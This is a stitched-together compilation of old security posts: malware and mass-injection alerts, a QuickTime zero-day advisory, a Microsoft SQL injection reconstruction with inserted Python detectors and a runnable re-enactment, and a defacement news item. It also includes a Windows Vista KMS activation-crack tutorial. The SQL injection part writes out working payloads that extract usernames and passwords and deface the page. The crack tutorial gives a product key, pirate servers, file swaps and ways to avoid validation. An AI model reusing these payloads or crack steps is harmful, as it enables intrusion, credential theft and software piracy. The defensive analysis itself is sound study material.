China.com game site hosting malicious code

Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker technology has detected malicious code hosted on China.com's game site. The malware is a variant of VBS/Redlof, which is known to infect files with the extensions html, htm, php, jsp, htt, vbs and asp.

The malicious file (MD5: e6df57ea75a77112e94036e5138bd063) is placed in a directory that appears to be reserved for game patch downloads. The virus also spreads by infecting every outbound email sent by the victim with MS Outlook or Outlook Express.

Screenshot of site:

Screenshot of the malicious code:

More details on the Microsoft VM ActiveX component vulnerability (MS00-075)

Mass Attack JavaScript injection - UN and UK Government websites compromised - Date: 04.22.2008

Threat Type: Malicious Web Site / Malicious Code

This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js, hosted on http://www.nihao[removed].com. That JavaScript then redirects the user to 1.htm (hosted on the same server). Once loaded, the file attempts 8 different exploits (the earlier attack this April used 12). The exploits target Microsoft applications, specifically browsers not patched against the VML vulnerability MS07-004, as well as other applications. Ominously, files named McAfee.htm and Yahoo.php are also called by 1.htm, but they were no longer active at the time of writing.

There are further similarities between the two mass attacks. Resident on the latest malicious domain is a tool used to carry out the attack; an analysis of that tool can be found in the ISC diary entry here. That diary entry also mentions http://www.2117[removed].net, the domain used in the earlier attack (our blog post on that attack is here). It appears that the same tool was used to orchestrate this attack too.

When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:

Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:
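The injection described above lands as a script tag pointing at an outside host inside the victim site's own pages. The following is an added example, not code from the Websense alert: a check that pulls every script source out of a page, keeps the off-site ones and reports any host that is not on an allow-list. The two sample pages and the host injected.example are constructed for the example; the redacted domain from the alert is not reproduced.

```python
"""Added example (not from the Websense alert): detect an injected
<script src=...> tag that loads from a host the site does not own.
The sample pages and the host injected.example are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def foreign_script_hosts(html, page_host, allowed_hosts=()):
    """Return the sorted, de-duplicated hosts of <script src> tags that load
    from a host other than page_host and not in allowed_hosts.  Relative
    sources (no host component) are same-site and ignored."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    allowed = {h.lower() for h in allowed_hosts}
    flagged = set()
    for src in collector.srcs:
        # hostname is None for '/js/site.js'; '//host/x.js' yields 'host'
        host = urlsplit(src).hostname
        if host is None:
            continue
        if host != page_host.lower() and host not in allowed:
            flagged.add(host)
    return sorted(flagged)


# Constructed page carrying an injected tag of the shape the alert describes:
# an external 1.js, once unquoted (as injection tools often emit it) and once quoted.
COMPROMISED_PAGE = """<html><head><title>Events</title>
<script src="/js/site.js"></script></head>
<body><h1>Venue list</h1>
<p>Cardiff<script src=http://injected.example/1.js></script></p>
<p>Reading<script src="http://injected.example/1.js"></script></p>
</body></html>"""

# Constructed clean page: only its own script and a known partner CDN.
CLEAN_PAGE = """<html><head><script src="//cdn.partner.example/lib.js"></script>
<script src="/js/site.js"></script></head><body>ok</body></html>"""

if __name__ == "__main__":
    print(foreign_script_hosts(COMPROMISED_PAGE, "www.example.org"))
    print(foreign_script_hosts(CLEAN_PAGE, "www.example.org",
                               allowed_hosts={"cdn.partner.example"}))
```

Because these injections are written into database text fields rather than into files on disk, the same function is worth running over the text columns pulled straight from the database, not only over rendered pages.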

Sites of varying content have been infected, including UK government sites and a United Nations website, as can be seen in the Google search results below.

The number of sites affected is in the hundreds of thousands:

Evidence of a compromise on a United Nations website:

Evidence of a compromise on a UK government website:

Evidence of a compromise on a Chinese tourism website:

Casualties of the previous attack included various US news web sites, a major Israeli shopping portal, and numerous travel sites.

Websense security customers are protected against this attack.

Zero-Day Exploit for Apple QuickTime Vulnerability

Proof-of-concept exploit code for a newly discovered vulnerability in Apple's QuickTime player was made available to the public today. The vulnerability (Apple QuickTime RTSP Response Header Content-Length Remote Buffer Overflow Vulnerability) was first reported on November 23rd by Polish security researcher Krystian Kloskowski.

The publicly released exploit works when tested against the latest stand-alone QuickTime Player, version 7.3. It does not appear to execute any shellcode when tested with the QuickTime browser plugin, even though the browser crashes because of the buffer overflow.

At the moment we believe the most likely attack scenarios using this vulnerability are:
1. Email-based attacks.
2. Web browser-based attacks.

In the email attack scenario the user receives a malicious email with an attachment whose extension is associated by default with QuickTime Player (e.g. .mov, .qt, .qtl, .gsm, .3gp, etc.). The attachment is not actually a media file; it is an XML file that forces the player to open an RTSP connection on port 554 to the malicious server hosting the exploit. When QuickTime Player contacts the remote server, it receives the malformed RTSP response, which triggers the buffer overflow and immediately executes the attacker's shellcode. This attack requires the user to double-click the QuickTime multimedia attachment. It is worth bearing in mind that the attack may also work with other common media formats such as .mpeg and .avi, and with other MIME types associated with QuickTime Player.

In the Web browser attack scenario, the attack will most likely start with a hyperlinked URL sent to the user. When the user clicks on the URL, the browser loads a page with a QuickTime streaming object embedded in it. The object initiates the RTSP connection to the malicious server on port 554, and the exploit code is sent back in the response.

We have tested the behaviour of the current exploit against some of the common Web browsers. With Internet Explorer 6/7 and Safari 3 Beta the attack is prevented.

In this case the browser loads QuickTime Player as an in-process plugin, and when the overflow occurs it triggers standard buffer overflow protection that shuts down the affected process before any damage can be done. Attackers may attempt to refine the exploit in the coming days to overcome this initial hiccup and create a reliable exploit that works in Internet Explorer.

Firefox users are more susceptible to this attack because Firefox hands the request directly to QuickTime Player as a separate process outside its control. As a result, the current version of the exploit works reliably against Firefox if the user has chosen QuickTime as the default player for multimedia formats.

At this time there is no patch available to resolve this issue, so to reduce the risk users are advised to restrict outbound connections on TCP port 554 using their firewalls and to avoid following links to untrusted Web sites.
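The exchange described above, the player's DESCRIBE request on TCP 554 and the server's malformed response, is modelled below in an added example that is not Apple's code or patch and not part of the original alert. It is the kind of defensive parser a proxy or IDS could apply to RTSP traffic: it rejects any header value longer than a fixed bound, which is the shape of the fault described (a header value larger than the buffer the player copies it into). The bound of 256 bytes, the request URL and both sample responses are constructed for the example.

```python
"""Added example (not Apple's code): a defensive RTSP response parser that
rejects over-long header values.  The bound, the sample request and both
sample responses are constructed."""
MAX_HEADER_VALUE = 256   # constructed bound; legitimate RTSP headers are far shorter
CRLF = b"\r\n"


class SuspiciousResponse(ValueError):
    """Raised for a response a hardened client or inspector should drop."""


def describe_request(url, cseq=1):
    """Client side of the exchange: the DESCRIBE a player sends after connecting."""
    return (f"DESCRIBE {url} RTSP/1.0\r\nCSeq: {cseq}\r\n"
            f"Accept: application/sdp\r\n\r\n").encode()


def parse_rtsp_response(raw, max_value=MAX_HEADER_VALUE):
    """Parse b'RTSP/1.0 200 OK\\r\\nName: value\\r\\n...\\r\\n\\r\\nbody'.

    Returns (status_code, headers, body) with header names lower-cased.
    Raises SuspiciousResponse on a missing header terminator, a bad status
    line, a header line without ':', a header value longer than max_value,
    or a non-numeric Content-Length."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise SuspiciousResponse("no end-of-headers marker")
    lines = head.split(CRLF)
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"RTSP/") or not parts[1].isdigit():
        raise SuspiciousResponse("bad status line")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise SuspiciousResponse("header line without ':'")
        value = value.strip()
        if len(value) > max_value:          # the oversized-header check
            raise SuspiciousResponse(
                f"{name.decode(errors='replace')} value is {len(value)} bytes")
        headers[name.strip().lower()] = value
    length = headers.get(b"content-length")
    if length is not None and not length.isdigit():
        raise SuspiciousResponse("non-numeric Content-Length")
    return int(parts[1]), headers, body


def is_safe(raw):
    """True if the response passes every check in parse_rtsp_response."""
    try:
        parse_rtsp_response(raw)
        return True
    except SuspiciousResponse:
        return False


# Constructed benign exchange: a small SDP description returned to DESCRIBE.
SDP = b"v=0\r\no=- 1 1 IN IP4 192.0.2.10\r\ns=demo\r\nm=video 0 RTP/AVP 96\r\n"
BENIGN_RESPONSE = (b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: application/sdp\r\n"
                   b"Content-Length: " + str(len(SDP)).encode() + CRLF + CRLF + SDP)

# Constructed hostile response: a Content-Length value padded to 1024 bytes,
# the shape of the malformed header described.  The padding is inert digits.
HOSTILE_RESPONSE = (b"RTSP/1.0 200 OK\r\nCSeq: 1\r\nContent-Type: application/sdp\r\n"
                    b"Content-Length: " + b"9" * 1024 + CRLF + CRLF)

if __name__ == "__main__":
    print(describe_request("rtsp://192.0.2.10:554/clip.mov").decode())
    print("benign passes:", is_safe(BENIGN_RESPONSE))
    print("hostile passes:", is_safe(HOSTILE_RESPONSE))
```

A length bound on every header value is a coarse check, but it is cheap, protocol-agnostic and catches this whole class of malformed response without needing a signature for one particular header.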

Windows Vista Crack - Automatic KMS Activation with KMS Activator

Windows Vista Business and Windows Vista Enterprise users who prefer the KMS activation crack method to activate their copy of Windows Vista now have a fully automated utility from www.hot8.cn that performs all the activation cracking steps automatically. With the Vista KMS Automatic Activation Tool, you no longer need to open a command prompt and type the slmgr or cscript slmgr.vbs commands that are needed to activate Windows Vista Business or Enterprise edition against a spoofed KMS server manually. The tool runs all of these steps automatically to activate Vista illegally.


Steps to use Vista KMS automatic activation crack tool to activate Windows Vista Business and Enterprise editions

  1. After installing Windows Vista, boot up and log in to Windows Vista with the default administrator account.
  2. Run the Vista automatic activation tool with administrator privileges (right-click on Vista_kms_activation_tool.exe and select “Run as Administrator”).
  3. Select the KMS server you want to use from the drop-down list in the “KMS server options” section. The patch utility will automatically test the connection to the selected KMS server to verify that the KMS service exists and is valid. If the KMS server is down or cannot be reached, the program will appear to hang for a while and then display the error message “Connection server anomalies, please wait to try again…”, with the “Activated” button inactive or greyed out. In this case, select another KMS server.
  4. Note that before activation the Windows Vista system must not download or install any Windows Updates, and must never perform genuine Windows validation. Once Vista has been cracked and activated, you can download any updates from Microsoft Update.
  5. If you see the message “Connect server success can be activated” in the status bar after selecting the KMS server, Windows Vista is ready to be activated. Click on the “Activated” button.
  6. The activation process may take up to 1 minute, so wait patiently while the automatic KMS activation tool changes your product key (it should be YFKBB-PQJJV-G996G-VWGXY-2V3X8), registers the key and the Vista system on the KMS server, and activates the Vista system.
  7. When activated, you will see the congratulation message “You have successfully activate the Vista”.


Download Vista KMS automatic activation tool V2.5 (Vista_kms_activation_tool.exe is reported by some anti-virus products to contain the Win32:Killreg-F trojan; use it at your own risk).



Version 2.5 of the Vista KMS automated activation tool adds the ability to define a new KMS server. This is useful if you plan to install and create your own KMS server, or run your own mini KMS server image for activation purposes. By default, the tool has built-in settings for the www.hot8.cn and hot8.vipp.cc KMS servers. You can add new KMS servers by clicking on “Definition Server”. A new row opens at the bottom with the message “Please input KMS addresses and port (Port is not imported, acquiescence 1688)”. Type the host name, IP address or Internet URL of the new KMS server in the Server Address field and the port number in the Port text box. If you leave the port number blank, the default KMS server port 1688 will be used. Click on the “Connection Test” button when done and follow the instructions above to activate Vista with KMS.


http://cnc.vbs.net.cn/
http://vbs.net.cn
http://tele.vbs.net.cn/
* All of the above use a random port which changes every 30 minutes. Click on the URL to check the current port number. You may need to use a proxy in China to access the websites.

Hack to Activate Windows Vista Home Basic and Home Premium Edition with KMS Server Crack

Apparently it is not only Windows Vista Ultimate that can be activated with a KMS server: Windows Vista Home Basic and Windows Vista Home Premium activation can also be cracked with the same KMS server hack. The trick is still the same: replace the two original files related to licensing and activation, tokens.dat and pkeyconfig.xrm-ms, with those from Windows Vista Business edition. This effectively converts the installed edition of Windows Vista to Business edition, with its corresponding product key, which can be activated against a KMS host.

A cracker from an anti Windows Product Activation (WPA) forum has successfully activated Windows Vista Home Basic by patching the system with the frankenbuild crack method and subsequently activating it against a KMS server (you can activate against a “public” KMS server, a self-built KMS host, or a KMS local activation server VMware VM image / mini KMS virtual machine image). Why he installed Home Basic edition instead of Vista Ultimate when both can be cracked in the same way is beyond comprehension.



Windows Script Host showing the query result for Windows Vista activation status from the slmgr -dlv command, after activating with KMS using the frankenbuild crack.



Windows Vista Home Basic activated with KMS still shows as Home Basic edition in System Properties and still offers the option to upgrade to a higher edition.

Thus, the KMS host can be used to activate all editions of Windows Vista, including Home Basic, Home Premium and Ultimate, provided you have patched the system by replacing the original tokens.dat (in the \Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareLicensing directory) and pkeyconfig.xrm-ms (in the \Windows\System32\Licensing\pkeyconfig folder) with the files used for activating a frankenbuild system. For guidance, see the step-by-step tutorial on how to crack Vista Ultimate.

However, it is unclear which features you get in Vista Home Basic and Home Premium when they are activated with a Business edition KMS product key; in Vista Ultimate, the features are restricted to those available in Business edition. If the features are likewise restricted to those of Business edition, this indirectly upgrades your cheaper Vista edition.

Note: a frankenbuild Vista can be caught by Microsoft, so remember to avoid the KB929391 Windows Update hotfix.

Microsoft UK Events Website Hacked

A detailed analysis of how the website was hacked and how it could have been avoided.

The partner event registration page of the Microsoft UK events website has been defaced by a hacker who discovered and exploited a web application vulnerability in one of the parameters used by the form on the page, which could previously be accessed at:

http://www.microsoft.co.uk/events/net/eventdetail.aspx?eventid=8399 [taken offline]

The hacker, known as "rEmOtEr", defaced Microsoft's page by taking advantage of an SQL injection vulnerability in one of the parameters the form passed in the URL of the page. This parameter was not being filtered, so the hacker could pass arbitrary crafted SQL straight to the database used by the form.

In addition, the hacker discovered table and column names (data fields) in the database whose contents were retrieved and shown on the page. This means that any text, or even code, inserted into such a column was then displayed on the page.

Tasks performed by the hacker to view database passwords

The following is a short reconstruction of some of the steps the hacker performed to discover and exploit the SQL injection vulnerability in the registration form, allowing him to view the usernames and passwords stored in the system:

  1. The parameters of the form were filled in with unusual characters (such as ' and --) to see how the web site reacted. These characters have special meaning in SQL, which is why a well-written application filters them out or, better, passes them to the database as bound parameters. The parameters checked included:
      • Visible inputs (textboxes, dropdown lists, etc.) in the form (POST method)
      • Hidden inputs from the HTML source code of the page (POST method)
      • Parameters used in the URL (GET method)

  2. The URL of the page makes use of two interesting parameters, eventID and v2:
     http://www.microsoft.co.uk/events/net/PreRegister.aspx?eventID=p83968&v2=1

     Manipulating the parameter v2, for example by appending an apostrophe to it, produced the following response from the website:

     http://www.microsoft.co.uk/events/net/PreRegister.aspx?eventID=p83968&v2=1'


     Figure 1

     This error confirms two things:
      • Server-side error messages are ENABLED on the web server. These are usually enabled only during development and testing so that bugs, or in this case vulnerabilities, are found before going live; on a production site they are normally disabled so that no sensitive information is exposed.
      • The parameter v2 is NOT being filtered for malicious characters/code. Whatever this parameter contains is passed to the SQL Server without any filtering.

     This long SQL error revealed a lot of information about the underlying database, which the hacker used to further extract and change the data stored in it. He obtained more from the database by experimenting, through trial and error, with the SQL commands passed in this parameter, helped by the error messages displayed on the page.

  3. The SQL command 1 having 1=1-- was sent in the v2 parameter, where it was appended to the application's main SQL query. This adds a HAVING condition that is always true (1=1), but because the query has no GROUP BY, SQL Server rejects it and names a column from the select list in its error message (repeating the trick with that column added to a GROUP BY clause reveals the next one):

     http://www.microsoft.co.uk/events/net/PreRegister.aspx?eventID=p83968&v2=1 having 1=1--

     The result? More database information was revealed! The table name MultivenueLists and some column names such as recordID and venueStatus were exposed, from which the hacker learned more about the structure of the database.

     Note: in Structured Query Language (SQL) columns are referred to with the notation TABLE.COLUMN, which is why the columns appear as MultivenueLists.recordID.
  4. Once the hacker knew the names of tables and columns, he injected text into a specific column by adding a statement such as 1 update MultivenueLists set venueStartDate='hacked by rEmOtEr';-- to the v2 parameter in the URL:

     …ster.aspx?eventID=p83968&v2=1 update MultivenueLists set venueStartDate='hacked by rEmOtEr';--


     Figure 2: The resulting page gives no error this time, but the text just inserted into the database is displayed on the page
  5. Using a UNION SELECT statement, the hacker obtained a list of usernames and passwords from the system by guessing the names of two columns (username and password) and one table (users). The seven values in the injected SELECT list match the number of columns returned by the page's own query, and the leading -1 makes the original query return no rows, so only the injected rows are displayed.

     This was the SQL command used in the v2 parameter to obtain the usernames:
     …ster.aspx?eventID=p83968&v2=-1 union select 1,2,3,4,username,6,7 from users--


     Figure 3

     This was the SQL command used in the v2 parameter to obtain the passwords:

     …ster.aspx?eventID=p83968&v2=-1 union select 1,2,3,4,password,6,7 from users--


     Figure 4

  6. Using a combination of queries with userID, the hacker was able to determine which password belonged to which username.
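The three injection techniques reconstructed above (the apostrophe probe that leaks a database error, the UNION SELECT that pulls rows from a guessed table, and the stacked UPDATE that writes attacker text into a displayed column) are re-enacted below against an in-memory SQLite database, with the parameterised query that closes the hole beside the vulnerable one. This is an added example, not code from the write-up or from the Microsoft site. The table and column names (MultivenueLists, recordID, venueStartDate, venueStatus, users, userID, username, password) follow the write-up; every other column, row and value is constructed. The live target was SQL Server; SQLite is used so the script runs offline, and the "having 1=1--" probe is left out because it depends on a SQL Server GROUP BY error message that SQLite does not produce.

```python
"""Added example (not from the write-up): error probe, UNION SELECT extraction
and stacked UPDATE against an in-memory SQLite copy of the described schema,
with the parameterised fix alongside.  All rows and non-named columns are
constructed sample data."""
import sqlite3

# Seven columns, matching the seven terms in the hacker's UNION SELECT.
SELECT_COLS = ("recordID, eventID, venueName, venueStartDate, "
               "venueStatus, venueCity, venueCapacity")


def build_db():
    """Constructed sample database with the two tables named in the write-up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE MultivenueLists (
            recordID INTEGER PRIMARY KEY, eventID TEXT, venueName TEXT,
            venueStartDate TEXT, venueStatus INTEGER,
            venueCity TEXT, venueCapacity INTEGER);
        CREATE TABLE users (
            userID INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO MultivenueLists VALUES
            (1, 'p83968', 'Reading TVP', '2007-07-01', 1, 'Reading', 200),
            (2, 'p83968', 'Cardiff Bay', '2007-07-08', 0, 'Cardiff', 150);
        INSERT INTO users VALUES
            (1, 'admin', 'Pa55w0rd'), (2, 'editor', 'letmein');
    """)
    return conn


def vulnerable_lookup(conn, event_id, v2):
    """BEFORE: v2 is concatenated into the statement, the defect described above."""
    sql = (f"SELECT {SELECT_COLS} FROM MultivenueLists "
           f"WHERE eventID = '{event_id}' AND venueStatus = {v2}")
    return conn.execute(sql).fetchall()


def vulnerable_batch(conn, event_id, v2):
    """Same concatenation run as a multi-statement batch.  SQL Server accepts a
    second statement with no separator (the write-up's payload has none);
    SQLite needs ';' and sqlite3 needs executescript(), so STACKED_UPDATE
    below carries a ';'."""
    sql = (f"SELECT {SELECT_COLS} FROM MultivenueLists "
           f"WHERE eventID = '{event_id}' AND venueStatus = {v2}")
    conn.executescript(sql)


def error_probe(conn, event_id, v2):
    """Return the database error text a verbose error page would leak, or None."""
    try:
        vulnerable_lookup(conn, event_id, v2)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def safe_lookup(conn, event_id, v2):
    """AFTER: parameterised; v2 is bound as a value and never parsed as SQL."""
    sql = (f"SELECT {SELECT_COLS} FROM MultivenueLists "
           "WHERE eventID = ? AND venueStatus = ?")
    return conn.execute(sql, (event_id, v2)).fetchall()


UNION_USERNAMES = "-1 union select 1,2,3,4,username,6,7 from users--"
STACKED_UPDATE = "1; update MultivenueLists set venueStartDate='hacked by rEmOtEr';--"

if __name__ == "__main__":
    db = build_db()
    print("apostrophe probe:", error_probe(db, "p83968", "1'"))
    print("union rows:", vulnerable_lookup(db, "p83968", UNION_USERNAMES))
    vulnerable_batch(db, "p83968", STACKED_UPDATE)
    print("after update:", safe_lookup(db, "p83968", 1))
    print("parameterised with payload:", safe_lookup(db, "p83968", UNION_USERNAMES))
```

With the bound parameter, the UNION payload and the apostrophe are compared against venueStatus as plain text and simply match nothing; the database never sees them as SQL. Validating v2 as an integer before the query would also have worked here, since it is only ever meant to be a number.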

Tasks performed by the hacker to deface the page


The following is a short reconstruction of some of the steps the hacker performed to turn the same SQL injection into a defacement of the page:

  1. Once the hacker knew how to inject his own content into the website's database, he prepared a simple HTML page on a third-party remote host to be used for the attack.
  2. Using commands similar to those used to display his own text on the page, the hacker inserted the URL of that HTML page into the database:

  3. The form page on the Microsoft site is built so that it loads a specific piece of text from the database when a user browses to it (typical of CMS systems). Since that text had been replaced by the hacker's link above, the contents loaded from the external host took over the entire look of the page.
  4. This is what the web page looked like as a result of the defacement:



Figure 5

What lead to this defacement?


There was a combination of two things that led to this defacement, apart from a hacker willing to take a shot at a form hosted on a Microsoft website:

  1. SQL Injection – One of the parameters in the URL was being sent directly to the database without being properly filtered. This gave the hacker a channel to talk directly to the database with the same rights as the account the web server uses to connect to the database server.
  2. Error Messages – From the SQL error messages enabled on the website, the hacker could work out how the database was structured. This helped him refine an SQL command until the database processed the instructions that inserted the defacement code.
How could it have been prevented?

The best way to prevent being hacked is to check your website regularly for vulnerabilities that hackers can exploit. Had that been done, this SQL injection vulnerability could have been detected and fixed before the page went live. In this case the fix is also simple: pass v2 to the database as a bound parameter (or reject anything that is not an integer), and turn off detailed server-side error messages on the production site.

How to keep your website secure


The larger the website, the more complex it is to check every page regularly for vulnerabilities. The hacked page on the Microsoft site was a small part of a much larger website and was overlooked, a common result of manual security auditing.

This complexity can be reduced with an automated web application scanner such as Acunetix Web Vulnerability Scanner. With such a tool you can scan every parameter of every form on your website for hundreds of vulnerabilities in a fully automated way, which cuts down the complexity and time required for a security audit of your website.

Using an automated web application scanner also means that whoever performs the audit does not need detailed technical knowledge of web vulnerabilities; they only need to run the application against the website and produce a vulnerability report.



French Microsoft Web site hacked

Hackers on Sunday broke into a part of Microsoft's French Web site, replacing the front page with online graffiti.

The intruders were able to access the server that was running "http://experts.microsoft.fr/", Microsoft confirmed Monday. The attack was claimed by Turkish hackers using the handle "TiTHacK", according to Zone-H, a security Web site that keeps an archive with screenshots of defaced Web sites.

The attackers were probably able to penetrate the server running the Web site due to faulty configuration, Microsoft said in a statement on Monday. "Microsoft took the appropriate action to resolve the issue and stop any additional criminal activity," the company said.

After breaking in, the attackers defaced the Microsoft Web site, leaving the following note: "Hi Master (: Your System 0wned By Turkish Hackers! redLine ownz y0u! Special Thanx And Gretz RudeBoy |SacRedSeer| The_Bekir And All Turkish HacKers next target: microsoft.com date: 18/06/2006 @ 19:06 WE WERE HERE...."

While so-called Web site defacements still occur often, they have become less high-profile in recent years as other, financially motivated threats take the spotlight.

Microsoft is working with law enforcement to investigate and take appropriate action against the attackers, the company said.

The compromised Web site was offline most of Monday. Microsoft said it is working to restore the site, which is hosted at an unidentified third-party Web hosting company. The Web site runs Microsoft's Windows Server 2003 with IIS 6.0 Web server software, according to Netcraft, a UK-based Internet-monitoring company.

"We apologise if customers are inconvenienced by the unavailability of the affected Web site," Microsoft said. "Microsoft is committed to helping protect our customers and we're working diligently with the third-party hosting company to restore the functionality of this Web site as soon as possible."